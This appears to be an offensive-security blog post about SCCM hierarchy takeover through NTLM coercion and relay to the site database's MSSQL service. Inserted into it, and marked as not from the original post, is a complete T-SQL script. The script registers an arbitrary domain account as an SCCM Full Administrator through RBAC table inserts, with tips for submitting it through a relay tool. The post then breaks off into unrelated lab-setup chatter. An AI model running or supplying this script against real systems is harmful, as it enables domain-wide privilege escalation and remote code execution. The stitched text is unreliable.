Hierarchy Takeover via NTLM Coercion and Relay to MSSQL

Introduction

This post is part of a series on SCCM exploitation. If you haven’t yet, don’t miss SCCM Range Deployment — it’s like setting up your own SCCM sandbox, minus the sand in your underwear.

[Figure: ntlm2mssql-diagram-atk-flow (attack flow: coerce the Primary Site Server, relay its NTLM authentication to MSSQL on the site database server)]

At the end of this post, you will know how to coerce an SCCM Primary Site Server into authenticating to a host you control, and how to relay that NTLM authentication to the MSSQL service on the site database server. What for, you might ask? To make an arbitrary domain account a member of the SMS Admins group which, granted the right permissions at the database level, gives you remote command execution as SYSTEM across the entire SCCM fleet.
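As an added example (this is not code from the post, and the post itself walks through its own steps later), here is the database side of that sentence: the T-SQL a practitioner would run over the relayed MSSQL session to register an account as an SCCM administrative user and grant it the Full Administrator role. It uses the publicly documented RBAC_Admins and RBAC_ExtendedPermissions inserts for this kind of site takeover; the site code PS1 (hence database CM_PS1), the account CORP\lowpriv and its binary SID are placeholder assumptions you must replace with values from the target domain.

```sql
-- Added example, not from the original post.
-- Placeholders (assumptions): site code PS1, account CORP\lowpriv, and its
-- SID in SQL binary form. Resolve the real SID beforehand (for instance
-- from an LDAP objectSid lookup) and paste it as a VARBINARY literal.
USE CM_PS1;

DECLARE @LogonName NVARCHAR(256) = N'CORP\lowpriv';
DECLARE @SiteCode  NVARCHAR(3)   = N'PS1';
-- Placeholder SID (S-1-5-21-...-1104); replace with the target account's SID.
DECLARE @AdminSID  VARBINARY(85) = 0x0105000000000005150000001C00D1BCD181F1492BDFC23650040000;

-- 1. Register the account as an SCCM administrative user.
INSERT INTO RBAC_Admins
    (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate,
     ModifiedBy, ModifiedDate, SourceSite)
VALUES
    (@AdminSID, @LogonName, 0, 0, '', '', '', '', @SiteCode);

-- 2. Look up the AdminID the site assigned to the new row.
DECLARE @AdminID INT;
SELECT @AdminID = AdminID FROM RBAC_Admins WHERE LogonName = @LogonName;

-- 3. Grant the Full Administrator role (SMS0001R) over every scope the
--    console would grant a Full Administrator created through the UI.
INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID)
VALUES
    (@AdminID, 'SMS0001R', 'SMS00ALL', '29'),  -- all securable objects
    (@AdminID, 'SMS0001R', 'SMS00001', '1'),   -- "All Systems" collection
    (@AdminID, 'SMS0001R', 'SMS00004', '1');   -- "All Users and User Groups" collection

-- 4. Verify what was written (and keep this output: it is your cleanup list).
SELECT a.AdminID, a.LogonName, p.RoleID, p.ScopeID, p.ScopeTypeID
FROM RBAC_Admins AS a
JOIN RBAC_ExtendedPermissions AS p ON p.AdminID = a.AdminID
WHERE a.LogonName = @LogonName;
```

Two practical notes: the relayed identity is the Primary Site Server's machine account, so the statements above run with whatever rights that account holds on the site database, and a relay tool that executes a single query per relayed session needs the whole script submitted as one batch (no `GO` separators). Record the AdminID and the three permission rows you inserted so they can be removed at the end of the engagement.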

SCCM Range Deployment

If you’ve never heard of Ludus, I almost feel bad for you. Because once you know, there’s no going back. This absolute game-changer is about to save you HOURS, and I’m basically your hero for telling you about it. You’re welcome. I’ve just changed your life, so feel free to name your firstborn after me.

Now, let’s give credit when credit is due. Who built that thing?

A talented person by the name of Erik Hunstad who also happens to be the founder of badsectorlabs.